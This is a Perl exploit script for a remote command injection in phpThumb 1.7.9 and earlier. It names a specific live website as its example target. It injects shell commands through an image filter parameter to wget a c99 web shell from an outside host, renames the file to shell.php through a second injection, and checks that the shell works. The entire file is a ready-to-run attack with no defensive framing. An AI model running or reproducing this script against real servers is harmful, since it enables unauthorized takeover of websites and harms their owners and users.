#!/usr/bin/perl
# Exploit Title: phpThumb v. <= 1.7.9 Remote Command Injection (Automatic Shell Upload)
# Enter the website in this form --> http://mobileworld24.pl/wp-content/themes/mobileworld24/inc/phpThumb/
use LWP::UserAgent;
use HTTP::Request;
$target = $ARGV[0];

if($target eq '')
{
print " \n";
sleep(0.8);
print " \n";
exit(1);
}

if ($target !~ /http:\/\//)
{
$target = "http://$target";
}

#print "[*] Enter the address of your hosted TXT shell (ex: 'http://c99.gen.tr/r57.txt') => ";
#$shell = <STDIN>;
#sleep(1);
print " \n";
sleep(1.1);
print "[*] Sending exploit ... \n";
sleep(1.1);
$agent = LWP::UserAgent->new();
$agent->agent('Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1');
#print "Enter the command to execute => ";
#$cmd = <STDIN>;

$website = "$target/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; wget kratos91.altervista.org/c991.txt -O c991.txt ; &phpThumbDebug=9";

$request = $agent->request(HTTP::Request->new(GET=>$website));

if ($request->is_success && ($request->content =~ /Malformed header from CGI/ || $request->content =~ /Saving to: / ))
{
print "[+] Exploit sent with success. \n";
sleep(1.4);
}

else
{
print "[-] Exploit sent but probably the website is not vulnerable. \n";
sleep(1.3);
}

print "[*] Controlling if the txt shell has been uploaded ...\n";
sleep(1.2);

$cwebsite = "$target/c991.txt";
$creq = $agent->request(HTTP::Request->new(GET=>$cwebsite));

if ($creq->is_success && ($creq->content =~ /c99shell.php/ || $creq->content =~ /shell/ ))
{
print "[+] Txt Shell uploaded :) \n";
sleep(1);
print "[*] Moving it to PHP format ... wait please ... \n";
sleep(1.1);
$mvwebsite = "$target/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; mv c991.txt shell.php ; &phpThumbDebug=9";
$mvreq = $agent->request(HTTP::Request->new(GET=>$mvwebsite));

$cwebsite = "$target/shell.php";
$c2req = $agent->request(HTTP::Request->new(GET=>$cwebsite));

if ($c2req->is_success && ($c2req->content =~ "/<b>Command execute<\/b><\/a> ::<\/b><\/p><\/td></tr/" || $c2req->content =~ /Safe-mode/ || $c2req->content =~ /c99shell/ || $c2req->content =~ /r57shell/ || $c2req->content =~ /uname -a/ || $c2req->content =~ /shell/ ))
{
print "[+] PHP Shell injected => '$cwebsite' :) \n";
sleep(0.8);
print "[*] Do you want to open it? (y/n) => ";
$open = <STDIN>;

if ($open == "y")
{
$firefox = "firefox $cwebsite";
system($firefox);
}

}

else
{
print "[-] Error while moving shell from Txt to Php :( \n";
exit(1);
}

}

else
{
print "[-] Txt shell not uploaded. :( \n";
}